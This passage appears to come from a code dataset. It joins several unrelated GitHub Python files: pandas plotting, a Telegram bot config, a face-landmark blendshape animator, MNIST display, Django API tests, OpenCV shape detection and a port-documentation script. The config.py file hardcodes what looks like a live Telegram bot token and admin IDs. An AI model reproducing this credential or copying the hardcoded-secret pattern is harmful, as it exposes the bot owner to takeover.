Operator\n#\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nfrom base64 import b64encode\nfrom ai_utils import read_data \n\n# Input filename\ninput_file = 'data/ai_ch11/data_2D.txt'\n\n# Load data\nx1 = read_data(input_file, 2)\nx2 = read_data(input_file, 3)\n\n# Create pandas dataframe for slicing\ndata = pd.DataFrame({'dim1': x1, 'dim2': x2})\n\n# Plot data\nstart = '1968'\nend = '1975'\ndata[start:end].plot()\nplt.title('Data overlapped on top of each other')\n\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url1 = b64encode(img.getvalue()).decode('ascii')\n\n# Filtering using conditions\n# - 'dim1' is smaller than a certain threshold\n# - 'dim2' is greater than a certain threshold\ndata[(data['dim1'] < 45) & (data['dim2'] > 30)].plot()\nplt.title('dim1 < 45 and dim2 > 30')\n\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url2 = b64encode(img.getvalue()).decode('ascii')\n\n# Adding two dataframes \nplt.figure()\ndiff = data[start:end]['dim1'] + data[start:end]['dim2']\ndiff.plot()\nplt.title('Summation (dim1 + dim2)')\n\n#plt.show()\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url3 = b64encode(img.getvalue()).decode('ascii')","repo_name":"ybbobasorde/ProjectX","sub_path":"src/Chapter00/ai_ch11/ai_ch11_3.py","file_name":"ai_ch11_3.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41058257099","text":"from plugins.check_db import get_user_ids, check_db_exist\n# CONFIG\nTELE_BOT_TOKEN = '662294408:AAEONHwx_zxR0PzFhmjqV0vYbLFxH5j2nIo'\nDB_NAME = 'lapotshop.sqlite'\nDEEP_LOGGING = False # FOR DEBUGGING PURPOSES ONLY\nPROXY_CONNECTION = False # ВКЛЮЧАЕТ СОЕДИНЕНИЕ С СЕРВЕРАМИ ТЕЛЕГИ ЧЕРЕЗ ПРОКСИ\nADMIN_IDS = (401814822, 0) # BOT's ADMINS\ncheck_db_exist()\nUSER_IDS = get_user_ids()\n\n# END OF CONFIG\n","repo_name":"AntonSmirnov2/Telegram_bot_lapotShop","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23714186338","text":"# blendshapes.py\n#\n# animate the bones of the 'Facegltf/sampledata.gltf' GLTF model\n# bone names came from inspecting scene.gltf\n# assumes the model 'izzy' already exists in ARENA scene 'cesium'\n\nimport arena\nimport random\nimport time\nimport signal\nimport json\nimport numpy as np\nfrom scipy.spatial import distance\nfrom scipy.spatial.transform import Rotation as R\n\nHOST = \"oz.andrew.cmu.edu\"\nSCENE = \"face-agr\"\nOBJECT = \"face-agr-model\"\n\nEYE_THRES = 0.16\nMOUTH_THRES = 0.25\n\nlast_face_state = { 'jawOpen': 0.0, 'eyeBlink_L':0.0, 'eyeBlink_R':0.0, 'browOuterUp_L':0.0, 'browOuterUp_R':0.0,'rotation':[1.0,1.0,1.0,1.0] }\n\nanims = [\n \"shapes.browInnerUp\",\n \"shapes.browDown_L\",\n \"shapes.browDown_R\",\n \"shapes.browOuterUp_L\",\n \"shapes.browOuterUp_R\",\n \"shapes.eyeLookUp_L\",\n \"shapes.eyeLookUp_R\",\n \"shapes.eyeLookDown_L\",\n \"shapes.eyeLookDown_R\",\n \"shapes.eyeLookIn_L\",\n \"shapes.eyeLookIn_R\",\n \"shapes.eyeLookOut_L\",\n \"shapes.eyeLookOut_R\",\n \"shapes.eyeBlink_L\",\n \"shapes.eyeBlink_R\",\n \"shapes.eyeSquint_L\",\n \"shapes.eyeSquint_R\",\n \"shapes.eyeWide_L\",\n \"shapes.eyeWide_R\",\n \"shapes.cheekPuff\",\n \"shapes.cheekSquint_L\",\n \"shapes.cheekSquint_R\",\n \"shapes.noseSneer_L\",\n \"shapes.noseSneer_R\",\n 
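# -- editor note (config.py, above): a live-looking Telegram bot token is
# hardcoded in source; anything committed like this should be treated as
# leaked and rotated. A common alternative is to read it from the
# environment at startup (the variable name here is illustrative):
import os

TELE_BOT_TOKEN = os.environ.get("TELE_BOT_TOKEN", "")
if not TELE_BOT_TOKEN:
    raise RuntimeError("TELE_BOT_TOKEN is not set")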
\"shapes.jawOpen\",\n \"shapes.jawForward\",\n \"shapes.jawLeft\",\n \"shapes.jawRight\",\n \"shapes.mouthFunnel\",\n \"shapes.mouthPucker\",\n \"shapes.mouthLeft\",\n \"shapes.mouthRight\",\n \"shapes.mouthRollUpper\",\n \"shapes.mouthRollLower\",\n \"shapes.mouthShrugUpper\",\n \"shapes.mouthShrugLower\",\n \"shapes.mouthClose\",\n \"shapes.mouthSmile_L\",\n \"shapes.mouthSmile_R\",\n \"shapes.mouthFrown_L\",\n \"shapes.mouthFrown_R\",\n \"shapes.mouthDimple_L\",\n \"shapes.mouthDimple_R\",\n \"shapes.mouthUpperUp_L\",\n \"shapes.mouthUpperUp_R\",\n \"shapes.mouthLowerDown_L\",\n \"shapes.mouthLowerDown_R\",\n \"shapes.mouthPress_L\",\n \"shapes.mouthPress_R\",\n \"shapes.mouthStretch_L\",\n \"shapes.mouthStretch_R\",\n \"tongue_out\"\n]\n\nclass Face(object):\n def __init__(self, msg_json):\n self.counter = 0\n self.update(msg_json)\n\n def update(self, msg_json):\n self.counter += 1\n\n self.srcWidth = msg_json[\"image\"][\"width\"]\n self.srcHeight = msg_json[\"image\"][\"height\"]\n\n self.rot = msg_json[\"pose\"][\"quaternions\"]\n self.trans = msg_json[\"pose\"][\"translation\"]\n\n self.bbox = np.array(msg_json[\"bbox\"]).reshape((2,-1))\n\n self.landmarksRaw = np.array(msg_json[\"landmarks\"]) # [x1, y1, x2, y2...]\n self.landmarks = self.landmarksRaw.reshape((-1,2)) # [[x1,y1],[x2,y2]...]\n self.landmarks = self.unrotateLandmarks(self.landmarks, self.rot)\n self.com = np.mean(self.landmarks, axis=0) # \"center of mass\" of face\n self.landmarks = self.normalizeToCOM(self.landmarks, self.com)\n\n def unrotateLandmarks(self, landmarks, rot):\n homoPts = np.vstack([landmarks.T, np.ones(len(landmarks))])\n transformed = (np.linalg.inv(R.from_quat(rot).as_matrix()) @ homoPts)\n unrot = transformed / transformed[-1]\n return unrot[:-1].T\n\n def normalizeToCOM(self, landmarks, com):\n return (landmarks - com) / (np.max(landmarks, axis=0)-np.min(landmarks, axis=0))\n\n def mouthAspect(self):\n height1 = distance.euclidean(self.lipInnerPts[1], self.lipInnerPts[7])\n height2 = distance.euclidean(self.lipInnerPts[2], self.lipInnerPts[6])\n height3 = distance.euclidean(self.lipInnerPts[3], self.lipInnerPts[5])\n width = distance.euclidean(self.lipInnerPts[0], self.lipInnerPts[4])\n return ((height1 + height2 + height3) / 3) / width\n\n def eyeAspect(self, eyePts):\n height1 = distance.euclidean(eyePts[1], eyePts[5])\n height2 = distance.euclidean(eyePts[2], eyePts[4])\n width = distance.euclidean(eyePts[0], eyePts[3])\n return ((height1 + height2) / 2) / width\n\n def create_line(self, pts1, pts2, name):\n x1 = pts1[0]\n y1 = pts1[1] + 2\n x2 = pts2[0]\n y2 = pts2[1] + 2\n\n line = arena.Line(\n (x1,y1,-0.5),\n (x2,y2,-0.5),\n 2,\n \"#ffffff\"\n )\n arena.Object(\n objName=name,\n objType=arena.Shape.line,\n line=line,\n persist=False\n )\n\n def drawLandmarks(self):\n arena.Object(\n objName=\"origin\",\n objType=arena.Shape.sphere,\n scale=(0.01,0.01,0.01),\n location=(0,2,-0.5),\n persist=False\n )\n for i in range(0, len(self.jawPts)-1):\n self.create_line(self.jawPts[i], self.jawPts[i+1], \"jaw\"+str(i))\n for i in range(0, len(self.eyebrowLPts)-1):\n self.create_line(self.eyebrowLPts[i], self.eyebrowLPts[i+1], \"browL\"+str(i))\n for i in range(0, len(self.eyebrowRPts)-1):\n self.create_line(self.eyebrowRPts[i], self.eyebrowRPts[i+1], \"browR\"+str(i))\n for i in range(0, len(self.noseBridgePts)-1):\n self.create_line(self.noseBridgePts[i], self.noseBridgePts[i+1], \"noseB\"+str(i))\n for i in range(0, len(self.noseLowerPts)-1):\n self.create_line(self.noseLowerPts[i], 
self.noseLowerPts[i+1], \"noseL\"+str(i))\n self.create_line(self.noseLowerPts[0], self.noseLowerPts[-1], \"noseL\"+str(i+1))\n for i in range(0, len(self.eyeLPts)-1):\n self.create_line(self.eyeLPts[i], self.eyeLPts[i+1], \"eyeL\"+str(i))\n self.create_line(self.eyeLPts[0], self.eyeLPts[-1], \"eyeL\"+str(i+1))\n for i in range(0, len(self.eyeRPts)-1):\n self.create_line(self.eyeRPts[i], self.eyeRPts[i+1], \"eyeR\"+str(i))\n self.create_line(self.eyeRPts[0], self.eyeRPts[-1], \"eyeR\"+str(i+1))\n for i in range(0, len(self.lipOuterPts)-1):\n self.create_line(self.lipOuterPts[i], self.lipOuterPts[i+1], \"lipO\"+str(i))\n self.create_line(self.lipOuterPts[0], self.lipOuterPts[-1], \"lipO\"+str(i+1))\n for i in range(0, len(self.lipInnerPts)-1):\n self.create_line(self.lipInnerPts[i], self.lipInnerPts[i+1], \"lipI\"+str(i))\n self.create_line(self.lipInnerPts[0], self.lipInnerPts[-1], \"lipI\"+str(i+1))\n\n @property\n def faceWidth(self):\n # Grab some point to normalize face with distance\n # Not sure if width of face is good?\n return distance.euclidean(self.jawPts[0],self.jawPts[-1])\n\n @property\n def blinkAmount(self):\n return (self.eyeAspect(self.eyeRPts) + self.eyeAspect(self.eyeLPts)) / 2\n\n @property\n def jawPts(self):\n return self.landmarks[0:17]\n\n @property\n def eyebrowLPts(self):\n return self.landmarks[17:22]\n\n @property\n def eyebrowRPts(self):\n return self.landmarks[22:27]\n\n @property\n def noseBridgePts(self):\n return self.landmarks[27:31]\n\n @property\n def noseLowerPts(self):\n return self.landmarks[30:36] # both parts of nose are connected, so index is 30:36 and not 31:36\n\n @property\n def eyeLPts(self):\n return self.landmarks[36:42]\n\n @property\n def eyeRPts(self):\n return self.landmarks[42:48]\n\n @property\n def lipOuterPts(self):\n return self.landmarks[48:60]\n\n @property\n def lipInnerPts(self):\n return self.landmarks[60:68]\n\n\nface = None\n\ndef callback(msg):\n global face, last_face_state\n msg_json = json.loads(msg)\n if \"hasFace\" in msg_json and msg_json[\"hasFace\"]:\n if face is None:\n face = Face(msg_json)\n else:\n face.update(msg_json)\n\n # face.drawLandmarks()\n\n # Outer Brow is set as a normalized scaler compared to face width\n browOuterUp_L = distance.euclidean(face.landmarks[19],face.landmarks[37])\n browOuterUp_R = distance.euclidean(face.landmarks[44],face.landmarks[24])\n # print( \"Raw Brow Left:\" , browOuterUp_L )\n # print( \"Raw Brow Right:\" , browOuterUp_R )\n\n browOuterScalar = 10.0\n browOuterUp_L -= 0.04\n browOuterUp_R -= 0.04\n\n browOuterUp_L = (browOuterUp_L/face.faceWidth) * browOuterScalar\n browOuterUp_R = (browOuterUp_R/face.faceWidth) * browOuterScalar\n\n if browOuterUp_L < 0:\n browOuterUp_L = 0\n if browOuterUp_R < 0:\n browOuterUp_R = 0\n\n if abs(last_face_state['browOuterUp_L']-browOuterUp_L) < 0.3:\n browOuterUp_L = last_face_state['browOuterUp_L']\n last_face_state['browOuterUp_L'] = browOuterUp_L\n\n if abs(last_face_state['browOuterUp_R']-browOuterUp_R) < 0.3:\n browOuterUp_R = last_face_state['browOuterUp_R']\n last_face_state['browOuterUp_R'] = browOuterUp_R\n\n # print( \"Brow Left:\" , browOuterUp_L )\n # print( \"Brow Right:\" , browOuterUp_R )\n\n # Mouth is set as a normalized scaler compared to face width\n mouthRight = distance.euclidean(face.landmarks[63],face.landmarks[65])\n mouthLeft = distance.euclidean(face.landmarks[61],face.landmarks[67])\n mouthPucker = distance.euclidean(face.landmarks[48],face.landmarks[54])\n\n mouthScalar = 5.0\n mouthThresh = 0.2\n\n mouthRight = 
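# -- editor note (blendshape-head-animator.py, this record): the
# eyeAspect()/blinkAmount logic is the standard eye-aspect-ratio (EAR)
# trick -- the ratio collapses toward 0 as the lid closes, and EYE_THRES
# (0.16 above) is the cut-off. A compact standalone version of the same
# computation:
import numpy as np

def eye_aspect_ratio(eye_pts):
    """eye_pts: six (x, y) landmarks ordered around one eye contour."""
    p1, p2, p3, p4, p5, p6 = np.asarray(eye_pts, dtype=float)
    height = np.linalg.norm(p2 - p6) + np.linalg.norm(p3 - p5)
    return height / (2.0 * np.linalg.norm(p1 - p4))

# blink detected when eye_aspect_ratio(pts) < EYE_THRES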
(mouthRight/face.faceWidth) * mouthScalar\n mouthLeft = (mouthLeft/face.faceWidth) * mouthScalar\n mouthPucker = (mouthPucker/face.faceWidth)\n # print( \"RawPucker: \", mouthPucker )\n mouthPucker -= 0.35 # remove DC offset\n if mouthPucker < 0.0:\n mouthPucker = 0.0\n mouthPucker *= 2\n mouthPucker = 1.0 - mouthPucker # Invert it\n mouthPucker = 0.0\n # print( \"MouthPucker: \", mouthPucker )\n\n openness = face.mouthAspect()\n if openness < MOUTH_THRES: openness = 0.0\n\n # print(face.blinkAmount)\n blink = int(face.blinkAmount < EYE_THRES)\n\n morphStr = '{ \"gltf-morph\": {\"morphtarget\": \"shapes.jawOpen\", \"value\": \"' + str(openness) + '\" },'\n # morphStr = '{ \"gltf-morph\": {\"morphtarget\": \"shapes.mouthUpperUp_L\", \"value\": \"' + str(mouthLeft) + '\" },'\n # morphStr += '\"gltf-morph__2\": {\"morphtarget\": \"shapes.mouthUpperUp_R\", \"value\": \"' + str(mouthRight) + '\" },'\n # morphStr += '\"gltf-morph__3\": {\"morphtarget\": \"shapes.mouthLowerDown_L\", \"value\": \"' + str(mouthLeft) + '\" },'\n # morphStr += '\"gltf-morph__4\": {\"morphtarget\": \"shapes.mouthLowerDown_R\", \"value\": \"' + str(mouthRight) + '\" },'\n morphStr += '\"gltf-morph__5\": {\"morphtarget\": \"shapes.eyeBlink_L\", \"value\": \"' + str(blink) + '\" },'\n morphStr += '\"gltf-morph__6\": {\"morphtarget\": \"shapes.eyeBlink_R\", \"value\": \"' + str(blink) + '\" },'\n morphStr += '\"gltf-morph__7\": {\"morphtarget\": \"shapes.browOuterUp_L\", \"value\": \"' + str(browOuterUp_L) + '\" },'\n morphStr += '\"gltf-morph__8\": {\"morphtarget\": \"shapes.browOuterUp_R\", \"value\": \"' + str(browOuterUp_R) + '\" },'\n morphStr += '\"gltf-morph__9\": {\"morphtarget\": \"shapes.mouthPucker\", \"value\": \"' + str(mouthPucker) + '\" }'\n morphStr += '}'\n\n rotChange = distance.euclidean(face.rot,last_face_state['rotation'])\n if rotChange < 0.03:\n face.rot = last_face_state['rotation']\n last_face_state['rotation'] = face.rot\n\n # print(morphStr)\n if face.counter % 2 == 0:\n obj = arena.Object(\n rotation=face.rot,\n # location=(face.trans[0]/10, face.trans[1]/10+3, (face.trans[2]+50)/10-5),\n # rotation=(0,0,0.6-openness,1), # quaternion value roughly between -.05 and .05\n objName=OBJECT,\n # url=\"models/Facegltf/sampledata.gltf\",\n objType=arena.Shape.gltf_model,\n scale=(15,15,15),\n location=(0,2,-5),\n data=morphStr\n )\n\n\narena.init(HOST, \"realm\", SCENE, callback=callback)\narena.handle_events()\n","repo_name":"mwfarb/ARENA-py","sub_path":"tools/face-avatar/legacy/blendshape-head-animator.py","file_name":"blendshape-head-animator.py","file_ext":"py","file_size_in_byte":11846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"42871500093","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# reload a module in python3\n#\n# import imp\n# imp.reload(mnist_image)\n\n\ndef show(dataset, index):\n img = dataset.images[index]\n print('digit: %d' % unvectorized_result(dataset.labels[index]))\n m = np.reshape(dataset.images[index], (28, 28))\n plt.imshow(m)\n plt.show()\n\n\ndef unvectorized_result(vec):\n print(vec)\n if np.ndarray == type(vec):\n for x in range(0, len(vec)):\n if vec[x] == 1:\n return x\n else:\n return vec\n","repo_name":"taot/playground","sub_path":"tensorflow/mnist/mnist_image.py","file_name":"mnist_image.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36850777062","text":"# 
coding=utf-8\nfrom django.test import TestCase\nfrom writeit.models import WriteItApiInstance, WriteItInstance, Message, Answer\nfrom django.db import IntegrityError\nfrom unittest import skip\nimport slumber\nfrom django.conf import settings\nfrom datetime import datetime\nfrom unittest import skip\nfrom popolo.models import Person\nfrom writeit.apikey_auth import ApiKeyAuth\nimport re\nfrom django.contrib.sites.models import Site\n\n\nclass WriteItApiInstanceTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url=settings.LOCAL_TESTING_WRITEIT)\n\n def test_create_instance(self):\n self.assertTrue(self.api_instance)\n self.assertEquals(self.api_instance.url, settings.LOCAL_TESTING_WRITEIT)\n\n def test_instances_are_unique(self):\n self.api_instance.save()\n instance2 = WriteItApiInstance(url= self.api_instance.url)\n with self.assertRaises(IntegrityError):\n instance2.save()\n\n def test_instance_returns_an_slumber_api(self):\n api = self.api_instance.get_api()\n self.assertTrue(isinstance(api, slumber.API) )\n\n def test_instance_api_with_auth(self):\n api = self.api_instance.get_api()\n auth = api._store['session'].auth\n self.assertTrue(isinstance(auth, ApiKeyAuth))\n self.assertEquals(auth.username, settings.WRITEIT_USERNAME)\n self.assertEquals(auth.api_key, settings.WRITEIT_KEY)\n\nfrom mock import patch\nfrom fixtures import instances\n\n\nclass WriteItInstanceTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url= settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n\n def test_writeit_instance_creation(self):\n writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\",\n remote_id=1\n )\n self.assertTrue(writeitinstance)\n self.assertEquals(writeitinstance.api_instance, self.api_instance)\n self.assertEquals(writeitinstance.name, 'the name of the thing')\n self.assertEquals(writeitinstance.url, \"/api/v1/instance/1/\")\n self.assertEquals(writeitinstance.remote_id, 1)\n\n\n def test_unicode(self):\n writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\",\n remote_id=1\n )\n self.assertEquals(writeitinstance.__unicode__(), 'the name of the thing at http://127.0.0.1.xip.io:3001/api/v1')\n\n\n def test_retrieve_all2(self):\n self.api_instance.get_all()\n\n post_retrieve_instances = WriteItInstance.objects.all()\n self.assertTrue(post_retrieve_instances.count())\n self.assertEquals(post_retrieve_instances[0].remote_id, 1)\n self.assertEquals(post_retrieve_instances[1].remote_id, 2)\n self.assertEquals(post_retrieve_instances[0].name, \"instance 1\")\n \n self.assertEquals(post_retrieve_instances[1].name, \"instance 2\")\n\n self.assertEquals(post_retrieve_instances[0].url, \"/api/v1/instance/1/\")\n self.assertEquals(post_retrieve_instances[1].url, \"/api/v1/instance/2/\")\n self.assertEquals(post_retrieve_instances[0].api_instance, self.api_instance)\n self.assertEquals(post_retrieve_instances[1].api_instance, self.api_instance)\n\n # @skip(\"Not yet creating an instance\")\n def test_I_can_post_a_writeit_instance(self):\n api_instance, created = WriteItApiInstance.objects.get_or_create(url= settings.LOCAL_TESTING_WRITEIT)\n writeitinstance = WriteItInstance.objects.create(api_instance = api_instance, name='the name of the thing')\n writeitinstance.push_to_the_api()\n self.assertTrue(writeitinstance.url)\n 
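The tests above assert that the slumber session carries an ApiKeyAuth with a username and api_key. A sketch of what such an auth hook can look like for requests/slumber — the "ApiKey user:key" header format follows tastypie's convention and is an assumption here, since writeit/apikey_auth.py itself is not shown:

import requests

class ApiKeyAuth(requests.auth.AuthBase):
    def __init__(self, username, api_key):
        self.username = username
        self.api_key = api_key

    def __call__(self, request):
        # Attach the tastypie-style API-key header to every request.
        request.headers["Authorization"] = "ApiKey %s:%s" % (self.username, self.api_key)
        return request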
self.assertTrue(writeitinstance.remote_id)\n self.assertEquals(writeitinstance.url, u'/api/v1/instance/%s/' % writeitinstance.remote_id)\n\n\n api = api_instance.get_api()\n response = api.instance(writeitinstance.remote_id).get()\n # writeit returns this when \n # getting http://localhost:2425/api/v1/instance/2/?format=json&username=admin&api_key=a\n # {\n # id: 2,\n # messages_uri: \"/api/v1/instance/2/messages/\",\n # moderation_needed_in_all_messages: false,\n # name: \"instance 2\",\n # rate_limiter: 0,\n # resource_uri: \"/api/v1/instance/2/\",\n # slug: \"instance2\"\n # }\n self.assertEquals(response['name'], writeitinstance.name)\n\n @skip('Not using popit')\n def test_I_can_post_a_writeit_instance_with_a_popit_api(self):\n\n popit_load_data()\n\n\n api_instance = WriteItApiInstance.objects.create(url= settings.LOCAL_TESTING_WRITEIT)\n writeitinstance = WriteItInstance.objects.create(api_instance = api_instance, name='the name of the thing')\n writeitinstance.push_to_the_api(extra_params={\n 'popit-api': settings.TEST_POPIT_API_URL\n })\n self.assertTrue(writeitinstance.url)\n self.assertTrue(writeitinstance.remote_id)\n api = api_instance.get_api()\n response = api.instance(writeitinstance.remote_id).get()\n self.assertEquals(response['name'], writeitinstance.name)\n self.assertEquals(len(response['persons']), 2)\n \n\n popit_instance = PopitApiInstance.objects.create(url= settings.TEST_POPIT_API_URL)\n popit_instance.fetch_all_from_api()\n persons = Person.objects.filter(api_instance=popit_instance)\n fiera = Person.objects.get(name=\"Fiera Feroz\")\n raton = Person.objects.get(name=\"Ratón Inteligente\")\n #Checking that Fiera and Ratón are in the persons array\n self.assertIn(raton.popit_url, response['persons'])\n self.assertIn(fiera.popit_url, response['persons'])\n\n\nclass MessageTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url=settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n self.writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\"\n )\n self.person1 = Person.objects.create(\n name= \"Felipe\",\n )\n\n\n def test_message_instanciate(self):\n message = Message.objects.create(api_instance=self.api_instance\n , author_name='author'\n , author_email='author email'\n , subject = 'subject'\n , content = 'content'\n , writeitinstance = self.writeitinstance\n , slug='subject-slugified'\n )\n message.people.add(self.person1)\n\n self.assertTrue(message)\n self.assertEquals(message.api_instance, self.api_instance)\n self.assertEquals(message.author_name, 'author')\n self.assertEquals(message.author_email, 'author email')\n self.assertEquals(message.subject, 'subject')\n self.assertEquals(message.content, 'content')\n self.assertEquals(message.writeitinstance, self.writeitinstance)\n self.assertEquals(message.slug, 'subject-slugified')\n self.assertEquals(message.people.all().count(), 1)\n self.assertEquals(message.people.all()[0], self.person1)\n\n\nclass MessageRemoteGetterTestCase(TestCase):\n def setUp(self):\n site = Site.objects.get(id=settings.SITE_ID)\n site.domain = 'localhost:8000'\n site.name = 'localhost:8000'\n site.save()\n self.api_instance = WriteItApiInstance(url= settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n self.writeitinstance = WriteItInstance.objects.create(api_instance=self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\"\n )\n self.person1 = Person.objects.create(\n 
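For context on the api.instance(remote_id).get() calls in these tests: slumber maps attribute access to URL segments, so the call below requests /api/v1/instance/<id>/ relative to the base URL. A hedged sketch (base_url and auth are whatever the caller configures):

import slumber

def fetch_instance(base_url, remote_id, auth=None):
    # instance(...) appends the id as a path segment; get() issues the GET.
    api = slumber.API(base_url, auth=auth)
    return api.instance(remote_id).get()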
name=\"Felipe\",\n )\n\n def test_when_posting_to_the_api_writeit_message_gets_a_remote_uri(self):\n message = Message.objects.create(api_instance=self.api_instance\n , author_name='author'\n , author_email='falvarez@votainteligente.cl'\n , subject = 'subject'\n , content = 'content'\n , writeitinstance = self.writeitinstance\n )\n message.people.add(self.person1)\n message.push_to_the_api()\n\n #Now I must be sure that message has a remote_uri,\n #that is reachable and that it contains what it is expected\n\n match_id = re.match(r'^/api/v1/message/(?P\\d+)/?', message.url)\n\n self.assertIsNotNone(match_id)\n\n def test_when_I_fetch_an_instance_it_brings_all_its_messages_as_well(self):\n self.writeitinstance.fetch_messages(1)\n\n created_messages = Message.objects.all()\n\n self.assertTrue(created_messages.count())\n self.assertTrue(created_messages[0].author_email)\n self.assertTrue(created_messages[0].remote_id)\n self.assertTrue(created_messages[0].author_name)\n\n def test_get_all_messages_with_answers(self):\n self.writeitinstance.fetch_messages(1)\n\n answers = Answer.objects.all()\n self.assertTrue(answers.count())\n self.assertEquals(answers[0].content, \"Public Answer\")\n self.assertEquals(answers[0].remote_id, 1)\n\n","repo_name":"ciudadanointeligente/writeit-django","sub_path":"writeit/tests/writeit_instances_tests.py","file_name":"writeit_instances_tests.py","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3713923362","text":"import cv2\r\nimport numpy as np\r\n\r\ndef getContours(img):\r\n contours, hierarchy= cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\r\n for cnt in contours:\r\n area=cv2.contourArea(cnt)\r\n print(area)\r\n if area>0:\r\n cv2.drawContours(imgContour, cnt, -1, (0, 0, 255),1)\r\n perimeter=cv2.arcLength(cnt,True)\r\n print(perimeter)\r\n approx=cv2.approxPolyDP(cnt,0.02*perimeter,True)\r\n print(len(approx))\r\n objCorners=len(approx)\r\n x,y,width,height=cv2.boundingRect(approx)\r\n\r\n if objCorners==3:\r\n objectType='Triangle'\r\n elif objCorners==4:\r\n if(width!=height):\r\n objectType='Rectangle'\r\n else:\r\n objectType='Square'\r\n elif objCorners>10:\r\n objectType='Heart'\r\n else:\r\n objectType='Circle'\r\n\r\n\r\n cv2.rectangle(imgContour, (x, y), (x + width, y + height), (0, 255, 0), 2)\r\n cv2.putText(imgContour,objectType,(x+(width//2)-10,y+(height//2)-10),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),2)\r\n\r\nimg=cv2.imread('Resources/Screenshot (23).png')\r\nimgContour =img.copy()\r\nimgGray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nimgBlur=cv2.GaussianBlur(imgGray,(7,7),2)\r\nimgCanny=cv2.Canny(imgBlur,130,130)\r\nimgBlank=np.zeros_like(img)\r\n\r\nimgTotal=cv2.hconcat([imgGray,imgBlur,imgCanny])\r\ncv2.imshow('Shapes',img)\r\ncv2.imshow('Shapes(Blur and Gray)',imgTotal)\r\n#cv2.imshow('Blank',imgBlank)\r\ngetContours(imgCanny)\r\ncv2.imshow('Contout Image :',imgContour)\r\n\r\n\r\n\r\ncv2.waitKey(0)","repo_name":"bhaskarjoshe/Learning-OpenCV","sub_path":"Chapter 8- Contours and Shape Detection.py","file_name":"Chapter 8- Contours and Shape Detection.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10515324738","text":"#!/usr/bin/python\n\nimport sys\n\nif len(sys.argv) != 4:\n print(\"Usage\\n%s block %s-p2p.txt p2p-doc.txt\" % sys.argv[0])\n sys.exit(0)\n\ndef pnodes(n):\n nn = n.split(\":\")\n p1 = nn[0].split(\".\")\n 
p2 = ['PNONE'] if len(nn) == 1 else nn[1].split(\".\")\n return { 'b':p1[0], 'x':int(p1[1]), 'y':int(p1[2]), 'i':(-1 if len(p1) < 4 else int(p1[3])), 'p':p2[0], 'ip':(-1 if len(p2) < 2 else int(p2[1])) }\n\n\nblock = sys.argv[1].upper()\n\nport = {}\nfor die in ['e50f', 'gx25f', 'gt75f', 'gt150f', 'gt300f', 'sx50f', 'sx120f']:\n for l in open(sys.argv[2] % die):\n ls = l.rstrip('\\n\\r').split()\n s = pnodes(ls[0])\n d = pnodes(ls[1])\n if s['b'] != block and d['b'] != block:\n continue\n if s['b'] == block:\n n1 = s\n n2 = d\n s2d = True\n else:\n n1 = d\n n2 = s\n s2d = False\n \n a = None\n if n1['p'] not in port:\n a = {}\n port[n1['p']] = a\n else:\n a = port[n1['p']]\n dkey = n2['b'] + ':' + n2['p'] if n2['p'] != 'PNONE' else n2['b']\n if dkey not in a:\n a[dkey] = [[n1['i']], [n1['ip']], s2d]\n else:\n if n1['i'] not in a[dkey][0]:\n a[dkey][0].append(n1['i'])\n if n1['ip'] not in a[dkey][1]:\n a[dkey][1].append(n1['ip'])\n\ndocs = {}\nfor l in open(sys.argv[3]):\n ls = l.rstrip('\\n\\r').split(maxsplit=1)\n if len(ls) == 0:\n continue\n docs[ls[0].upper()] = ls[1] if len(ls) >= 2 else \"\"\n\ndef mkinst(gl):\n vals = ''\n if len(gl) != 1 or gl[0] != -1:\n s = None\n e = None\n for vv in sorted(gl):\n assert(vv != -1)\n if e == None or vv != e+1:\n if s != None:\n if vals != '':\n vals += ', '\n if s != e:\n vals += \"%d-%d\" % (s, e)\n else:\n vals += \"%d\" % s\n s = vv\n e = vv\n else:\n e = vv\n if vals != '':\n vals += ', '\n if s != e:\n vals += \"%d-%d\" % (s, e)\n else:\n vals += \"%d\" % s\n return vals\n\nentries = []\nhead = [\"Port Name\", \"Instance\", \"Port bits\", \"Dir\", \"Remote port\", \"Documentation\" ]\nfor p,g in port.items():\n for gg,gl in g.items():\n\n binst = mkinst(gl[0])\n pinst = mkinst(gl[1])\n dd = '>' if gl[2] else '<'\n key = block + ':' + p + '_' + gg if gl[2] else gg + '_' + block + ':' + p\n doc = 'TODO' if key not in docs else docs[key]\n entries.append([\"\" if p == 